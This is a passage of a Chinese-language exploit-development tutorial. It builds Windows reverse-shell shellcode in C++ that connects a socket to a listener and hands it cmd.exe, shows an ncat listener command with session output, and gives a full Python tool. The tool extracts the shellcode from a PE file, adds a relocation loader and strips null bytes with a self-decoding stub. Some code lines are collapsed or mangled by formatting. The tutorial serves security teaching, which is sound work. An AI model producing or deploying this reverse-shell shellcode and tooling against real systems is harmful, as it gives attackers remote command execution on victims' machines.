“`
decltype(WSAStartup) *My_WSAStartup = (decltype(WSAStartup) *)getProcAddrByHash(HASH_WSAStartup)

“`

`decltype(WSAStartup)`为 `WSAStartup`函数的类型。这样，我们无需重定义函数原型。注意：在`C++11`中有关于 `decltype`的描述。

现在我们可通过`My_WSAStartup`调用 `WSAStartup`

注意：从模块中导入函数之前，我们需要确保已经在内存中加载了这个模块。

最简单的方法是使用`LoadLibrary`加载模块。

“`
DefineFuncPtr(LoadLibraryA);
My_LoadLibraryA(“ws2_32.dll”);

“`

该操作有效，因为`kernel32.dll`中已导入了`LoadLibrary`，正如我们说过的，它总会出现在内存中。

我们也可以导入`GetProcAddress`并使用它来获取所有其它我们需要的函数地址，但是没必要这么做，因为我们需要将所有的函数名包含在`shellcode`中。

#### entryPoint

显然，`entryPoint`是`shellcode`和实现反向`shell`的入口点。首先，我们导入所有我们需要的函数，接着我们使用它们。细节不重要并且我不得不说`winsock API`的使用非常麻烦。

在`nutshell`中:

1.创建套接字， 2.将套接字连接到`127.0.0.1:123`， 3.创建一个执行`cmd.exe`的进程， 4.将套接字附加到进程的标准输入，标准输出以及标准错误输出， 5.等待进程被终止， 6.当进程已经终止时，则终止当前线程。

第3点与第4点同时进行，第4点调用了`CreateProcess`, 攻击者可以连接到端口123上进行监听，一旦被成功连接，就可以通过套接字（`socket`）,即`TCP`连接，与运行在远程机器中的`cmd.exe`进行交互。

安装`ncat`，运行cmd并在命令行上输入：

“`
ncat -lvp 123

“`

此时将会在端口123上监听.

接着回到`Visual Studio 2013`，选择`Release`，搭建项目并运行它。再回到`ncat`，你将观察到如下：

“`
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\Kiuhnm>ncat -lvp 123
Ncat: Version 6.47 ( http://nmap.org/ncat )
Ncat: Listening on :::123
Ncat: Listening on 0.0.0.0:123
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:4409.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\Kiuhnm\documents\visual studio 2013\Projects\shellcode\shellcode>

“`

现在可以执行任意命令了。退出则输入`exi`t。

#### main

得益于`linker`的选项

“`
Function Order: function_order.txt

“`

`function_order.txt`中的第一行仅有一行存在`?entryPoint@@YAHXZ`字符串，函数 `entryPoint`将首先被定位在`shellcode`中。

在源码中，`linker`决定了函数的顺序，因此我们可在任意函数前放入`entryPoint` 。`main`函数在源码中的最后部分，因此它会在`shellcode`的结尾处被链接。当描述映射文件时，我们将了解到这是如何实现的。

### 0x02 Python脚本

#### 介绍

现在，含有`shellcode`的执行体已经准备就绪，我们需要一种提取并修复`shellcode`的方法。这并不容易，我已经编写了`Python`脚本来实现：

1.提取`shellcode`

2.处理字符串的重定位信息

3.通过移除`null`字节修复`shellcode`

使用 `PyCharm` (下载地址).

该脚本只有392行，但是它有些复杂，因此我将对其进行解释：代码如下：

“`
# Shellcode extractor by Massimiliano Tomassoli (2015)

import sys
import os
import datetime
import pefile

author = ‘Massimiliano Tomassoli’
year = datetime.date.today().year

def dword_to_bytes(value):
    return [value & 0xff, (value >> 8) & 0xff, (value >> 16) & 0xff, (value >> 24) & 0xff]

def bytes_to_dword(bytes):
    return (bytes[0] & 0xff) | ((bytes[1] & 0xff) << 8) | \            ((bytes[2] & 0xff) << 16) | ((bytes[3] & 0xff) << 24) def get_cstring(data, offset):     '''     Extracts a C string (i.e. null-terminated string) from data starting from offset.     '''     pos = data.find('\0', offset)     if pos == -1:         return None     return data[offset:pos+1] def get_shellcode_len(map_file):     '''     Gets the length of the shellcode by analyzing map_file (map produced by VS 2013)     '''     try:         with open(map_file, 'r') as f:             lib_object = None             shellcode_len = None             for line in f:                 parts = line.split()                 if lib_object is not None:                     if parts[-1] == lib_object:                         raise Exception('_main is not the last function of %s' % lib_object)                     else:                         break                 elif (len(parts) > 2 and parts[1] == ‘_main’):
                    # Format:
                    # 0001:00000274  _main   00401274 f   shellcode.obj
                    shellcode_len = int(parts[0].split(‘:’)[1], 16)
                    lib_object = parts[-1]

            if shellcode_len is None:
                raise Exception(‘Cannot determine shellcode length’)
    except IOError:
        print(‘[!] get_shellcode_len: Cannot open “%s”‘ % map_file)
        return None
    except Exception as e:
        print(‘[!] get_shellcode_len: %s’ % e.message)
        return None

    return shellcode_len

def get_shellcode_and_relocs(exe_file, shellcode_len):
    ”’
    Extracts the shellcode from the .text section of the file exe_file and the string
    relocations.
    Returns the triple (shellcode, relocs, addr_to_strings).
    ”’
    try:
        # Extracts the shellcode.
        pe = pefile.PE(exe_file)
        shellcode = None
        rdata = None
        for s in pe.sections:
            if s.Name == ‘.text\0\0\0’:
                if s.SizeOfRawData < shellcode_len:                     raise Exception('.text section too small')                 shellcode_start = s.VirtualAddress                 shellcode_end = shellcode_start + shellcode_len                 shellcode = pe.get_data(s.VirtualAddress, shellcode_len)             elif s.Name == '.rdata\0\0':                 rdata_start = s.VirtualAddress                 rdata_end = rdata_start + s.Misc_VirtualSize                 rdata = pe.get_data(rdata_start, s.Misc_VirtualSize)         if shellcode is None:             raise Exception('.text section not found')         if rdata is None:             raise Exception('.rdata section not found')         # Extracts the relocations for the shellcode and the referenced strings in .rdata.         relocs = []         addr_to_strings = {}         for rel_data in pe.DIRECTORY_ENTRY_BASERELOC:             for entry in rel_data.entries[:-1]:         # the last element's rvs is the base_rva (why?)                 if shellcode_start <= entry.rva < shellcode_end:                     # The relocation location is inside the shellcode.                     relocs.append(entry.rva - shellcode_start)      # offset relative to the start of shellcode                     string_va = pe.get_dword_at_rva(entry.rva)                     string_rva = string_va - pe.OPTIONAL_HEADER.ImageBase                     if string_rva < rdata_start or string_rva >= rdata_end:
                        raise Exception(‘shellcode references a section other than .rdata’)
                    str = get_cstring(rdata, string_rva – rdata_start)
                    if str is None:
                        raise Exception(‘Cannot extract string from .rdata’)
                    addr_to_strings[string_va] = str

        return (shellcode, relocs, addr_to_strings)

    except WindowsError:
        print(‘[!] get_shellcode: Cannot open “%s”‘ % exe_file)
        return None
    except Exception as e:
        print(‘[!] get_shellcode: %s’ % e.message)
        return None

def dword_to_string(dword):
    return ”.join([chr(x) for x in dword_to_bytes(dword)])

def add_loader_to_shellcode(shellcode, relocs, addr_to_strings):
    if len(relocs) == 0:
        return shellcode                # there are no relocations

    # The format of the new shellcode is:
    #       call    here
    #   here:
    #       …
    #   shellcode_start:
    #                (contains offsets to strX (offset are from “here” label))
    #   relocs:
    #       off1|off2|…       (offsets to relocations (offset are from “here” label))
    #       str1|str2|…

    delta = 21                                      # shellcode_start – here

    # Builds the first part (up to and not including the shellcode).
    x = dword_to_bytes(delta + len(shellcode))
    y = dword_to_bytes(len(relocs))
    code = [
        0xE8, 0x00, 0x00, 0x00, 0x00,               #   CALL here
                                                    # here:
        0x5E,                                       #   POP ESI
        0x8B, 0xFE,                                 #   MOV EDI, ESI
        0x81, 0xC6, x[0], x[1], x[2], x[3],         #   ADD ESI, shellcode_start + len(shellcode) – here
        0xB9, y[0], y[1], y[2], y[3],               #   MOV ECX, len(relocs)
        0xFC,                                       #   CLD
                                                    # again:
        0xAD,                                       #   LODSD
        0x01, 0x3C, 0x07,                           #   ADD [EDI+EAX], EDI
        0xE2, 0xFA                                  #   LOOP again
                                                    # shellcode_start:
    ]

    # Builds the final part (offX and strX).
    offset = delta + len(shellcode) + len(relocs) * 4           # offset from “here” label
    final_part = [dword_to_string(r + delta) for r in relocs]
    addr_to_offset = {}
    for addr in addr_to_strings.keys():
        str = addr_to_strings[addr]
        final_part.append(str)
        addr_to_offset[addr] = offset
        offset += len(str)

    # Fixes the shellcode so that the pointers referenced by relocs point to the
    # string in the final part.
    byte_shellcode = [ord(c) for c in shellcode]
    for off in relocs:
        addr = bytes_to_dword(byte_shellcode[off:off+4])
        byte_shellcode[off:off+4] = dword_to_bytes(addr_to_offset[addr])

    return ”.join([chr(b) for b in (code + byte_shellcode)]) + ”.join(final_part)

def dump_shellcode(shellcode):
    ”’
    Prints shellcode in C format (‘\x12\x23…’)
    ”’
    shellcode_len = len(shellcode)
    sc_array = []
    bytes_per_row = 16
    for i in range(shellcode_len):
        pos = i % bytes_per_row
        str = ”
        if pos == 0:
            str += ‘”‘
        str += ‘\\x%02x’ % ord(shellcode[i])
        if i == shellcode_len – 1:
            str += ‘”;\n’
        elif pos == bytes_per_row – 1:
            str += ‘”\n’
        sc_array.append(str)
    shellcode_str = ”.join(sc_array)
    print(shellcode_str)

def get_xor_values(value):
    ”’
    Finds x and y such that:
    1) x xor y == value
    2) x and y doesn’t contain null bytes
    Returns x and y as arrays of bytes starting from the lowest significant byte.
    ”’

    # Finds a non-null missing bytes.
    bytes = dword_to_bytes(value)
    missing_byte = [b for b in range(1, 256) if b not in bytes][0]

    xor1 = [b ^ missing_byte for b in bytes]
    xor2 = [missing_byte] * 4
    return (xor1, xor2)

def get_fixed_shellcode_single_block(shellcode):
    ”’
    Returns a version of shellcode without null bytes or None if the
    shellcode can’t be fixed.
    If this function fails, use get_fixed_shellcode().
    ”’

    # Finds one non-null byte not present, if any.
    bytes = set([ord(c) for c in shellcode])
    missing_bytes = [b for b in range(1, 256) if b not in bytes]
    if len(missing_bytes) == 0:
        return None                             # shellcode can’t be fixed
    missing_byte = missing_bytes[0]

    (xor1, xor2) = get_xor_values(len(shellcode))

    code = [
        0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                            # here:
        0xC0,                                               #   (FF)C0 = INC EAX
        0x5F,                                               #   POP EDI
        0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX,
        0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX,
        0x83, 0xC7, 29,                                     #   ADD EDI, shellcode_begin – here
        0x33, 0xF6,                                         #   XOR ESI, ESI
        0xFC,                                               #   CLD
                                                            # loop1:
        0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
        0x3C, missing_byte,                                 #   CMP AL,
        0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
        0xAA,                                               #   STOSB
        0xE2, 0xF6                                          #   LOOP loop1
                                                            # shellcode_begin:
    ]

    return ”.join([chr(x) for x in code]) + shellcode.replace(‘\0′, chr(missing_byte))

def get_fixed_shellcode(shellcode):
    ”’
    Returns a version of shellcode without null bytes. This version divides
    the shellcode into multiple blocks and should be used only if
    get_fixed_shellcode_single_block() doesn’t work with this shellcode.
    ”’

    # The format of bytes_blocks is
    #   [missing_byte1, number_of_blocks1,
    #    missing_byte2, number_of_blocks2, …]
    # where missing_byteX is the value used to overwrite the null bytes in the
    # shellcode, while number_of_blocksX is the number of 254-byte blocks where
    # to use the corresponding missing_byteX.
    bytes_blocks = []
    shellcode_len = len(shellcode)
    i = 0
    while i < shellcode_len:         num_blocks = 0         missing_bytes = list(range(1, 256))         # Tries to find as many 254-byte contiguous blocks as possible which misses at         # least one non-null value. Note that a single 254-byte block always misses at         # least one non-null value.         while True:             if i >= shellcode_len or num_blocks == 255:
                bytes_blocks += [missing_bytes[0], num_blocks]
                break
            bytes = set([ord(c) for c in shellcode[i:i+254]])
            new_missing_bytes = [b for b in missing_bytes if b not in bytes]
            if len(new_missing_bytes) != 0:         # new block added
                missing_bytes = new_missing_bytes
                num_blocks += 1
                i += 254
            else:
                bytes += [missing_bytes[0], num_blocks]
                break

    if len(bytes_blocks) > 0x7f – 5:
        # Can’t assemble “LEA EBX, [EDI + (bytes-here)]” or “JMP skip_bytes”.
        return None

    (xor1, xor2) = get_xor_values(len(shellcode))

    code = ([
        0xEB, len(bytes_blocks)] +                          #   JMP SHORT skip_bytes
                                                            # bytes:
        bytes_blocks + [                                    #   …
                                                            # skip_bytes:
        0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                            # here:
        0xC0,                                               #   (FF)C0 = INC EAX
        0x5F,                                               #   POP EDI
        0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX,
        0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX,
        0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF,        #   LEA EBX, [EDI + (bytes – here)]
        0x83, 0xC7, 0x30,                                   #   ADD EDI, shellcode_begin – here
                                                            # loop1:
        0xB0, 0xFE,                                         #   MOV AL, 0FEh
        0xF6, 0x63, 0x01,                                   #   MUL AL, BYTE PTR [EBX+1]
        0x0F, 0xB7, 0xD0,                                   #   MOVZX EDX, AX
        0x33, 0xF6,                                         #   XOR ESI, ESI
        0xFC,                                               #   CLD
                                                            # loop2:
        0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
        0x3A, 0x03,                                         #   CMP AL, BYTE PTR [EBX]
        0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
        0xAA,                                               #   STOSB
        0x49,                                               #   DEC ECX
        0x74, 0x07,                                         #   JE shellcode_begin
        0x4A,                                               #   DEC EDX
        0x75, 0xF2,                                         #   JNE loop2
        0x43,                                               #   INC EBX
        0x43,                                               #   INC EBX
        0xEB, 0xE3                                          #   JMP loop1
                                                            # shellcode_begin:
    ])

    new_shellcode_pieces = []
    pos = 0
    for i in range(len(bytes_blocks) / 2):
        missing_char = chr(bytes_blocks[i*2])
        num_bytes = 254 * bytes_blocks[i*2 + 1]
        new_shellcode_pieces.append(shellcode[pos:pos+num_bytes].replace(‘\0’, missing_char))
        pos += num_bytes

    return ”.join([chr(x) for x in code]) + ”.join(new_shellcode_pieces)

def main():
    print(“Shellcode Extractor by %s (%d)\n” % (author, year))

    if len(sys.argv) != 3:
        print(‘Usage:\n’ +
              ‘  %s

\n’ % os.path.basename(sys.argv[0]))
        return

    exe_file = sys.argv[1]
    map_file = sys.argv[2]

    print(‘Extracting shellcode length from “%s”…’ % os.path.basename(map_file))
    shellcode_len = get_shellcode_len(map_file)
    if shellcode_len is None:
        return
    print(‘shellcode length: %d’ % shellcode_len)

    print(‘Extracting shellcode from “%s” and analyzing relocations…’ % os.path.basename(exe_file))
    result = get_shellcode_and_relocs(exe_file, shellcode_len)
    if result is None:
        return
    (shellcode, relocs, addr_to_strings) = result

    if len(relocs) != 0:
        print(‘Found %d reference(s) to %d string(s) in .rdata’ % (len(relocs), len(addr_to_strings)))
        print(‘Strings:’)
        for s in addr_to_strings.values():
            print(‘  ‘ + s[:-1])
        print(”)
        shellcode = add_loader_to_shellcode(shellcode, relocs, addr_to_strings)
    else:
        print(‘No relocations found’)

    if shellcode.find(‘\0’) == -1:
        print(‘Unbelievable: the shellcode does not need to be fixed!’)
        fixed_shellcode = shellcode
    else:
        # shellcode contains null bytes and needs to be fixed.
        print(‘Fixing the shellcode…’)
        fixed_shellcode = get_fixed_shellcode_single_block(shellcode)
        if fixed_shellcode is None:             # if shellcode wasn’t fixed…
            fixed_shellcode = get_fixed_shellcode(shellcode)
            if fixed_shellcode is None:
                print(‘[!] Cannot fix the shellcode’)

    print(‘final shellcode length: %d\n’ % len(fixed_shellcode))
    print(‘char shellcode[] = ‘)
    dump_shellcode(fixed_shellcode)

main()

“`

#### 映射文件以及`shellcode`长度

在`linker`中使用如下选项来生成映射文件：

* Debugging:
* Generate Map File: Yes (/MAP)

告诉`linker`生成含有EXE结构的映射文件。

“`
* Map File Name: mapfile

“`

该映射文件主要用于判断`shellcode`长度。

这里是映射文件的相关部分：

“`
shellcode

Timestamp is 54fa2c08 (Fri Mar 06 23:36:56 2015)

Preferred load address is 00400000

Start Length Name Class
0001:00000000 00000a9cH .text$mn CODE
0002:00000000 00000094H .idata$5 DATA
0002:00000094 00000004H .CRT$XCA DATA
0002:00000098 00000004H .CRT$XCAA DATA
0002:0000009c 00000004H .CRT$XCZ DATA
0002:000000a0 00000004H .CRT$XIA DATA
0002:000000a4 00000004H .CRT$XIAA DATA
0002:000000a8 00000004H .CRT$XIC DATA
0002:000000ac 00000004H .CRT$XIY DATA
0002:000000b0 00000004H .CRT$XIZ DATA
0002:000000c0 000000a8H .rdata DATA
0002:00000168 00000084H .rdata$debug DATA
0002:000001f0 00000004H .rdata$sxdata DATA
0002:000001f4 00000004H .rtc$IAA DATA
0002:000001f8 00000004H .rtc$IZZ DATA
0002:000001fc 00000004H .rtc$TAA DATA
0002:00000200 00000004H .rtc$TZZ DATA
0002:00000208 0000005cH .xdata$x DATA
0002:00000264 00000000H .edata DATA
0002:00000264 00000028H .idata$2 DATA
0002:0000028c 00000014H .idata$3 DATA
0002:000002a0 00000094H .idata$4 DATA
0002:00000334 0000027eH .idata$6 DATA
0003:00000000 00000020H .data DATA
0003:00000020 00000364H .bss DATA
0004:00000000 00000058H .rsrc$01 DATA
0004:00000060 00000180H .rsrc$02 DATA

Address Publics by Value Rva+Base Lib:Object

0000:00000000 ___guard_fids_table 00000000
0000:00000000 ___guard_fids_count 00000000
0000:00000000 ___guard_flags 00000000
0000:00000001 ___safe_se_handler_count 00000001
0000:00000000 ___ImageBase 00400000 0001:00000000 ?entryPoint@@YAHXZ 00401000 f shellcode.obj
0001:000001a1 ?getHash@@YAKPBD@Z 004011a1 f shellcode.obj
0001:000001be ?getProcAddrByHash@@YAPAXK@Z 004011be f shellcode.obj
0001:00000266 _main 00401266 f shellcode.obj
0001:000004d4 _mainCRTStartup 004014d4 f MSVCRT:crtexe.obj
0001:000004de ?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z 004014de f MSVCRT:unhandld.obj
0001:0000051f ___CxxSetUnhandledExceptionFilter 0040151f f MSVCRT:unhandld.obj
0001:0000052e __XcptFilter 0040152e f MSVCRT:MSVCR120.dll

“`

从映射文件的开头得知，`section 1`为`.text`节，它含有代码：

“`
Start Length Name Class
0001:00000000 00000a9cH .text$mn CODE

“`

第二部分表明 `.text`节起始于 `?entryPoint@@YAHXZ`，这是我们的`entryPoint`函数，最后一个函数是函数`main`（这里被称作`_main`）。因为`main`函数在偏移`0x266`上，并且`entryPoint`函数位于“，我们的`shellcode`起始于`.text`节的开头，并且长度为`0x266`字节。

使用python实现：

“`
def get_shellcode_len(map_file):
    ”’
    Gets the length of the shellcode by analyzing map_file (map produced by VS 2013)
    ”’
    try:
        with open(map_file, ‘r’) as f:
            lib_object = None
            shellcode_len = None
            for line in f:
                parts = line.split()
                if lib_object is not None:
                    if parts[-1] == lib_object:
                        raise Exception(‘_main is not the last function of %s’ % lib_object)
                    else:
                        break
                elif (len(parts) > 2 and parts[1] == ‘_main’):
                    # Format:
                    # 0001:00000274  _main   00401274 f   shellcode.obj
                    shellcode_len = int(parts[0].split(‘:’)[1], 16)
                    lib_object = parts[-1]

            if shellcode_len is None:
                raise Exception(‘Cannot determine shellcode length’)
    except IOError:
        print(‘[!] get_shellcode_len: Cannot open “%s”‘ % map_file)
        return None
    except Exception as e:
        print(‘[!] get_shellcode_len: %s’ % e.message)
        return None

    return shellcode_len

“`

#### 提取 shellcode

这部分非常容易理解，我们知道`shellcode`的长度并且知道`shellcode`被定位在`.text`节的起始部分。代码如下：

“`
def get_shellcode_and_relocs(exe_file, shellcode_len):
    ”’
    Extracts the shellcode from the .text section of the file exe_file and the string
    relocations.
    Returns the triple (shellcode, relocs, addr_to_strings).
    ”’
    try:
        # Extracts the shellcode.
        pe = pefile.PE(exe_file)
        shellcode = None
        rdata = None
        for s in pe.sections:
            if s.Name == ‘.text\0\0\0’:
                if s.SizeOfRawData < shellcode_len:                     raise Exception('.text section too small')                 shellcode_start = s.VirtualAddress                 shellcode_end = shellcode_start + shellcode_len                 shellcode = pe.get_data(s.VirtualAddress, shellcode_len)             elif s.Name == '.rdata\0\0':

        if shellcode is None:
            raise Exception(‘.text section not found’)
        if rdata is None:
            raise Exception(‘.rdata section not found’)

“`

我使用了模块`pefile` ([下载地址](https://code.google.com/p/pefile/)). 相关的部分是`if`语句体。

#### 字符串和.rdata

正如之前所说的，`c/c++`代码可能含有字符串。例如，我们的`shellcode`含有如下代码：

“`
My_CreateProcessA(NULL, “cmd.exe”, NULL, NULL, TRUE, 0, NULL, NULL, &sInfo, &procInfo);

“`

字符串`cmd.exe`被定位在`.rdata`节中，该节是一个只读的含有数据（已被初始化）的节。该代码对字符串进行绝对地址引用。

“`
00241152 50 push eax
00241153 8D 44 24 5C lea eax,[esp+5Ch]
00241157 C7 84 24 88 00 00 00 00 01 00 00 mov dword ptr [esp+88h],100h
00241162 50 push eax
00241163 52 push edx
00241164 52 push edx
00241165 52 push edx
00241166 6A 01 push 1
00241168 52 push edx
00241169 52 push edx
0024116A 68 18 21 24 00 push 242118h <------------------------ 0024116F 52 push edx 00241170 89 B4 24 C0 00 00 00 mov dword ptr [esp+0C0h],esi 00241177 89 B4 24 BC 00 00 00 mov dword ptr [esp+0BCh],esi 0024117E 89 B4 24 B8 00 00 00 mov dword ptr [esp+0B8h],esi 00241185 FF 54 24 34 call dword ptr [esp+34h] ``` 正如我们观察到的，`cmd.exe`的绝对地址是`242118h`。注意该地址是push指令的一部分并且该绝对地址被定位在了`24116Bh`。如果我们用某个文件编辑器检测文件`cmd.exe`,我们看到如下： ``` 56A: 68 18 21 40 00 push 000402118h ``` 在文件中`56Ah`是偏移量。因为`image base`的偏移量为`400000h`，所以对应的虚拟地址是`40116A`。在内存中，这应该是执行体被加载的首选的（`preferred`）地址。执行体在指令中的绝对地址是`402118h`，如果执行体在首选的基地址上被加载，即表明已正确执行。然而，如果执行体在不同的基地址上被加载，那么需要修复指令。Windows如何知道执行体含有需要被修复的地址？PE文件含有一个相对目录（`Relocation Directory`），在我们的案例中它指向`.reloc`节。该相对目录中包含所有需要被修复的位置上的`RVA`。可以检查该目录并寻找如下所描述的位置上的地址 1.在`shellcode`中含有的（即从`.text:0`到末尾，`main`函数除外）， 2.含有`.rdata`中的数据指针。例如，在其他地址中，`Relocation Directory`将包含位于指令`push 402118h`的后四个字节的地址`40116Bh`。这些字节构成了地址`402118h`，它指向在`.rdata`中的字符串`cmd.exe`（起始于地址`402000h`）。观察函数`get_shellcode_and_reloc`s。在第一部分我们提取`.rdata`节： ``` def get_shellcode_and_relocs(exe_file, shellcode_len):     '''     Extracts the shellcode from the .text section of the file exe_file and the string     relocations.     Returns the triple (shellcode, relocs, addr_to_strings).     '''     try:         # Extracts the shellcode.         pe = pefile.PE(exe_file)         shellcode = None         rdata = None         for s in pe.sections:             if s.Name == '.text\0\0\0':
            elif s.Name == ‘.rdata\0\0’:
                rdata_start = s.VirtualAddress
                rdata_end = rdata_start + s.Misc_VirtualSize
                rdata = pe.get_data(rdata_start, s.Misc_VirtualSize)

        if shellcode is None:
            raise Exception(‘.text section not found’)
        if rdata is None:
            raise Exception(‘.rdata section not found’)

“`

相关部分是`elif`的语句体。

接着分析重定位部分，在我们的`shellcode`中寻找地址并从`.rdata`中提取被那些地址引用的以`null`结尾的字符串。

正如我们已经说过的，我们只关注`shellcode`中的地址。这里是函数`get_shellcode_and_relocs`的相关部分：

“`
# Extracts the relocations for the shellcode and the referenced strings in .rdata.
        relocs = []
        addr_to_strings = {}
        for rel_data in pe.DIRECTORY_ENTRY_BASERELOC:
            for entry in rel_data.entries[:-1]:         # the last element’s rvs is the base_rva (why?)
                if shellcode_start <= entry.rva < shellcode_end:                     # The relocation location is inside the shellcode.                     relocs.append(entry.rva - shellcode_start)      # offset relative to the start of shellcode                     string_va = pe.get_dword_at_rva(entry.rva)                     string_rva = string_va - pe.OPTIONAL_HEADER.ImageBase                     if string_rva < rdata_start or string_rva >= rdata_end:
                        raise Exception(‘shellcode references a section other than .rdata’)
                    str = get_cstring(rdata, string_rva – rdata_start)
                    if str is None:
                        raise Exception(‘Cannot extract string from .rdata’)
                    addr_to_strings[string_va] = str

        return (shellcode, relocs, addr_to_strings)

“`

`pe.DIRECTORY_ENTRY_BASERELOC`是一个数据结构表，它含有一个重定位表的入口。首先检查当前重定位信息是否在`shellcode`中。如果是，则进行如下操作：

1.将与`shellcode`的起始地址有关的重定位信息的偏移追加到 `relocs`；

2.从`shellcode`中提取在已经发现的偏移上的`DWORD`值，并在`.rdata`中检查该指向数据的`DWORD`值；

3.从`.rdata`中提取起始于我们在(2)中发现的以`null`结尾的字符串；

4.将字符串添加到`addr_to_strings`。

注意：

`i.relocs`含有在`shellcode`中重定位信息的偏移，即在需要被修复的`shellcode`中的`DWORD`值的偏移，以便它们指向字符串；

`ii.addr_to_strings`相当于一个与在(2)中被发现的字符串所在地址相关联的字典。

#### 将loader添加到shellcode

方法是将被包含在`addr_to_strings`中的字符串添加到我们`shellcode`的尾部，然后让我们的代码引用那些字符串。

不幸的是，代码->字符串的链接过程必须在运行时完成，因为我们不知道`shellcode`的起始地址，那么我们需要准备一个在运行时修复`shellcode`的“`loader`”。这是转化后的`shellcode`结构:

![enter image description here](http://drops.javaweb.org/uploads/images/0c6da1a59de94ba025faf085401802da91fc778a.jpg)

`OffX`是指向原`shellcode`中重定位信息的`DWORD`值，它们需要被修复。`loader`将修复这些地址来让它们指向正确的字符串`strX`。试图理解以下代码来了解实现原理：

“`
def add_loader_to_shellcode(shellcode, relocs, addr_to_strings):
    if len(relocs) == 0:
        return shellcode                # there are no relocations

    # The format of the new shellcode is:
    #       call    here
    #   here:
    #       …
    #   shellcode_start:
    #                (contains offsets to strX (offset are from “here” label))
    #   relocs:
    #       off1|off2|…       (offsets to relocations (offset are from “here” label))
    #       str1|str2|…

    delta = 21                                      # shellcode_start – here

    # Builds the first part (up to and not including the shellcode).
    x = dword_to_bytes(delta + len(shellcode))
    y = dword_to_bytes(len(relocs))
    code = [
        0xE8, 0x00, 0x00, 0x00, 0x00,               #   CALL here
                                                    # here:
        0x5E,                                       #   POP ESI
        0x8B, 0xFE,                                 #   MOV EDI, ESI
        0x81, 0xC6, x[0], x[1], x[2], x[3],         #   ADD ESI, shellcode_start + len(shellcode) – here
        0xB9, y[0], y[1], y[2], y[3],               #   MOV ECX, len(relocs)
        0xFC,                                       #   CLD
                                                    # again:
        0xAD,                                       #   LODSD
        0x01, 0x3C, 0x07,                           #   ADD [EDI+EAX], EDI
        0xE2, 0xFA                                  #   LOOP again
                                                    # shellcode_start:
    ]

    # Builds the final part (offX and strX).
    offset = delta + len(shellcode) + len(relocs) * 4           # offset from “here” label
    final_part = [dword_to_string(r + delta) for r in relocs]
    addr_to_offset = {}
    for addr in addr_to_strings.keys():
        str = addr_to_strings[addr]
        final_part.append(str)
        addr_to_offset[addr] = offset
        offset += len(str)

    # Fixes the shellcode so that the pointers referenced by relocs point to the
    # string in the final part.
    byte_shellcode = [ord(c) for c in shellcode]
    for off in relocs:
        addr = bytes_to_dword(byte_shellcode[off:off+4])
        byte_shellcode[off:off+4] = dword_to_bytes(addr_to_offset[addr])

    return ”.join([chr(b) for b in (code + byte_shellcode)]) + ”.join(final_part)

“`

观察`loader`：

“`
CALL here                   ; PUSH EIP+5; JMP here
  here:
    POP ESI                     ; ESI = address of “here”
    MOV EDI, ESI                ; EDI = address of “here”
    ADD ESI, shellcode_start + len(shellcode) – here        ; ESI = address of off1
    MOV ECX, len(relocs)        ; ECX = number of locations to fix
    CLD                         ; tells LODSD to go forwards
  again:
    LODSD                       ; EAX = offX; ESI += 4
    ADD [EDI+EAX], EDI          ; fixes location within shellcode
    LOOP again                  ; DEC ECX; if ECX > 0 then JMP again
  shellcode_start:

  relocs:
    off1|off2|…
    str1|str2|…

“`

首先，使用`CALL`来获取`here`在内存中的绝对地址。`loader`使用该信息对原`shellcode`中的偏移进行修复。`ESI`指向`off1`，因此使用`LODSD`来逐一读取偏移。该指令

“`
ADD [EDI+EAX], EDI

“`

用于修复`shellcode`中的地址。`EAX`是当前的`offX`，`offX`是与`here`相关的地址偏移。这意味着`EDI+EAX`是那个位置上的绝对地址。`DWORD`值在那个地址上包含相对于`here`的字符串偏移。通过将`EDI`添加到那个`DWORD`值，我们将该`DWORD`值转换为该字符串的绝对地址。当`loader`已经执行完毕时，`shellcode`已被修复，同时也被成功执行。

总结，如果存在重定位信息，那么会调用`add_loader_to_shellcode`。可在`main`函数中观察到：

“`

    if len(relocs) != 0:
        print(‘Found %d reference(s) to %d string(s) in .rdata’ % (len(relocs), len(addr_to_strings)))
        print(‘Strings:’)
        for s in addr_to_strings.values():
            print(‘  ‘ + s[:-1])
        print(”)
        shellcode = add_loader_to_shellcode(shellcode, relocs, addr_to_strings)
    else:
        print(‘No relocations found’)

“`

#### 从`shellcode`中移除`null`字节 (I)

编写如下两个函数来删去`null`字节。

“`
1.get_fixed_shellcode_single_block
2.get_fixed_shellcode

“`

可以试试使用第一个函数生成更短的代码，但是这样做不一定可被执行。但是如果使用第二个函数生成更长的代码，则必定可被执行。

首先观察`get_fixed_shellcode_single_block`函数，该函数的定义如下：

“`
def get_fixed_shellcode_single_block(shellcode):
    ”’
    Returns a version of shellcode without null bytes or None if the
    shellcode can’t be fixed.
    If this function fails, use get_fixed_shellcode().
    ”’

    # Finds one non-null byte not present, if any.
    bytes = set([ord(c) for c in shellcode])
    missing_bytes = [b for b in range(1, 256) if b not in bytes]
    if len(missing_bytes) == 0:
        return None                             # shellcode can’t be fixed
    missing_byte = missing_bytes[0]

    (xor1, xor2) = get_xor_values(len(shellcode))

    code = [
        0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                            # here:
        0xC0,                                               #   (FF)C0 = INC EAX
        0x5F,                                               #   POP EDI
        0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX,
        0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX,
        0x83, 0xC7, 29,                                     #   ADD EDI, shellcode_begin – here
        0x33, 0xF6,                                         #   XOR ESI, ESI
        0xFC,                                               #   CLD
                                                            # loop1:
